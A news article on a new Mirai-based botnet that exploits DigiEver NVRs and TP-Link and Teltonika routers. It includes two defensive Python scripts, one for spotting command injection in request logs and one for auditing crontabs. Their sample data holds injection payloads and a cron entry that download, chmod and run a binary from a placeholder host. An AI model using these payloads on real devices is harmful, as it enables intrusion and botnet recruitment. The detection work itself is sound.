A new Mirai-based botnet exploits vulnerabilities in several devices, focusing on unpatched DigiEver DS-2105 Pro NVRs, dated firmware on TP-Link routers, and Teltonika RUT9XX routers. The campaign commenced in October, with active exploitation traced back as far as September. Akamai researchers have confirmed ongoing attacks, which leverage multiple remote code execution flaws to enlist devices into the botnet for malicious activities.
New Mirai botnet exploits vulnerabilities in various devices
The botnet targets a specific remote code execution (RCE) vulnerability in DigiEver NVRs, which involves improper input validation in the ‘/cgi-bin/cgi_main.cgi’ URI. Hackers can remotely inject commands such as ‘curl’ and ‘chmod’ through parameters like the ntp field in HTTP POST requests. Ta-Lun Yen from TXOne previously highlighted this vulnerability, noting its impact on various DVR devices during a presentation at the DefCamp security conference.
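The injection pattern described above (shell commands smuggled into form fields such as `ntp` in POST requests to the CGI endpoint) is straightforward to hunt for in proxy or WAF logs. The following is an added detection example, not code from Akamai or the article: it assumes request records are logged as JSON lines with the decoded POST body, uses documentation IP ranges, and treats the extra `cmd=set_ntp` field as a hypothetical form parameter. It flags any parameter value carrying shell metacharacters or download/permission tools, and additionally checks that the `ntp` value is a plain hostname or address.

```python
import json
import re
from urllib.parse import unquote_plus

# CGI endpoint named in the article as the injection point.
TARGET_URI = "/cgi-bin/cgi_main.cgi"

# Characters that let a value break out of a single shell argument.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")
# Tools the article reports being injected (curl, chmod) plus common companions.
CMD_WORDS = re.compile(r"\b(curl|wget|chmod|tftp|busybox)\b", re.IGNORECASE)
# What a legitimate NTP server setting should look like: hostname or IPv4 only.
HOST_ONLY = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.\-]{0,252}$")

# Constructed sample records (decoded POST bodies as a reverse proxy or WAF
# might log them). IPs are documentation ranges; "cmd=set_ntp" is an assumed
# extra form field, not taken from the article.
SAMPLE_LOG = r"""
{"ts":"2024-10-03T11:02:14Z","src":"203.0.113.9","method":"POST","uri":"/cgi-bin/cgi_main.cgi","body":"cmd=set_ntp&ntp=pool.ntp.org"}
{"ts":"2024-10-03T11:02:15Z","src":"198.51.100.20","method":"POST","uri":"/cgi-bin/cgi_main.cgi","body":"cmd=set_ntp&ntp=pool.ntp.org%3Bcurl+http%3A%2F%2F198.51.100.20%2Fx+-o+%2Ftmp%2Fx%3Bchmod+777+%2Ftmp%2Fx"}
{"ts":"2024-10-03T11:02:16Z","src":"203.0.113.10","method":"GET","uri":"/index.html","body":""}
{"ts":"2024-10-03T11:02:17Z","src":"198.51.100.21","method":"POST","uri":"/cgi-bin/cgi_main.cgi","body":"cmd=set_ntp&ntp=time.example.org%60wget+x%60"}
"""


def parse_form(body):
    """Split a form-urlencoded body into (name, value) pairs.

    Done by hand so that ';' inside a value is never treated as a separator:
    older urllib.parse.parse_qs versions split on ';' too, which would cut the
    injected command out of the value before it is inspected.
    """
    pairs = []
    for field in body.split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def analyse(record):
    """Return the reasons a request looks like command injection, or [] if clean."""
    if record.get("method") != "POST" or record.get("uri") != TARGET_URI:
        return []
    reasons = []
    for name, value in parse_form(record.get("body", "")):
        if SHELL_META.search(value):
            reasons.append(f"{name}: shell metacharacter")
        if CMD_WORDS.search(value):
            reasons.append(f"{name}: command keyword")
        if name == "ntp" and not HOST_ONLY.match(value):
            reasons.append("ntp: not a plain hostname/IP")
    return reasons


def scan(log_text):
    """Run analyse() over every JSON line and collect the suspicious ones."""
    findings = []
    for line in log_text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        reasons = analyse(record)
        if reasons:
            findings.append({"ts": record["ts"], "src": record["src"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ts"], finding["src"], "; ".join(finding["reasons"]))
```

The hostname allow-list check matters more than the keyword list: an attacker can rename tools or percent-encode differently, but a value that is not a hostname or address has no legitimate reason to reach the `ntp` field at all, so that rule catches variants the keyword rule misses.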
In addition to the DigiEver flaw, the Mirai variant also exploits CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers. Researchers have noted that while the attacks on DigiEver devices have been directly observed by Akamai, they reflect similar methods previously described by Yen. The exploitation of these flaws supports a campaign aiming to establish a foothold in vulnerable devices.
Methodology and techniques used by attackers
Through command injection, attackers can fetch malware binaries hosted on external servers, facilitating the addition of compromised devices to the botnet. Once under control, the devices can be utilized to launch distributed denial of service (DDoS) attacks or facilitate further attacks on other targets. Persistence within the infected systems is maintained by introducing cron jobs, which ensure that the malware remains active despite potential reboots or other interruptions.
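Because the reported persistence mechanism is a cron job that keeps the fetched binary alive across reboots, auditing crontabs on exposed NVRs and routers is a practical check. The script below is an added example, not from Akamai or the article: it assumes the per-user crontab format common on BusyBox-based embedded Linux (five schedule fields or an `@` keyword, then the command), and the sample crontab, URL and paths are constructed placeholders rather than indicators from the campaign. It flags entries that download from a remote URL, stage or execute from world-writable directories, use hidden file names, or re-arm at every reboot.

```python
import re

# Constructed sample of a root crontab. The URL and file paths are placeholders,
# not indicators of compromise from the article.
CRON_SAMPLE = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/local/bin/backup.sh
*/10 * * * * wget -q http://198.51.100.20/bot.mips -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x
@reboot /dev/shm/.s
"""

DOWNLOADER = re.compile(r"\b(curl|wget|tftp|ftpget)\b")
REMOTE_URL = re.compile(r"\b(https?|tftp|ftp)://")
# Staging or execution in world-writable locations: typical on embedded Linux
# where the root filesystem is read-only and /tmp is the only writable place.
WRITABLE_PATH = re.compile(r"(?:^|[\s=&|;])(?:/tmp|/var/tmp|/dev/shm|/var/run)/")
HIDDEN_FILE = re.compile(r"/\.[^/\s]+")
CHMOD_EXEC = re.compile(r"\bchmod\b")


def split_entry(line):
    """Return (schedule, command) for a crontab line, or None for blank/comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):
        parts = line.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    fields = line.split(None, 5)
    if len(fields) < 6:
        return None
    return " ".join(fields[:5]), fields[5]


def audit_entry(schedule, command):
    """List the traits of one crontab entry that match the persistence pattern."""
    reasons = []
    if DOWNLOADER.search(command):
        reasons.append("fetches with a download tool")
    if REMOTE_URL.search(command):
        reasons.append("references a remote URL")
    if WRITABLE_PATH.search(command):
        reasons.append("uses a world-writable directory")
    if HIDDEN_FILE.search(command):
        reasons.append("touches a hidden file")
    if CHMOD_EXEC.search(command):
        reasons.append("changes file mode in place")
    # A reboot trigger is only interesting when combined with another trait;
    # plenty of legitimate services also use @reboot.
    if reasons and schedule == "@reboot":
        reasons.append("re-arms at every reboot")
    return reasons


def audit_crontab(text):
    """Scan a whole crontab and return the entries worth a closer look."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = audit_entry(schedule, command)
        if reasons:
            findings.append({"line": number, "schedule": schedule,
                             "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_crontab(CRON_SAMPLE):
        print(f"line {finding['line']} [{finding['schedule']}]: {finding['command']}")
        for reason in finding["reasons"]:
            print("   -", reason)
```

On a real device, feed it the output of `crontab -l` for each user and the contents of `/etc/crontabs/` and `/etc/cron.d/`; the system-wide crontab format carries an extra user field after the schedule, so adjust `split_entry` accordingly before pointing the script at `/etc/crontab`.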
Akamai’s findings highlight that this new Mirai variant features advanced encryption methods, including XOR and ChaCha20, indicating evolving tactics among botnet operators. Unlike many previous iterations of Mirai, which relied on basic string obfuscation, this variant showcases an intent to improve evasion and operational security. It targets a diverse range of architectures, including x86, ARM, and MIPS, broadening its potential impact across various device types.
Akamai researchers urge device owners and administrators to take proactive measures, including monitoring for the indicators of compromise (IoCs) that Akamai has published together with Yara rules for detecting and blocking the emerging threat.
Featured image credit: Kerem Gülen/Midjourney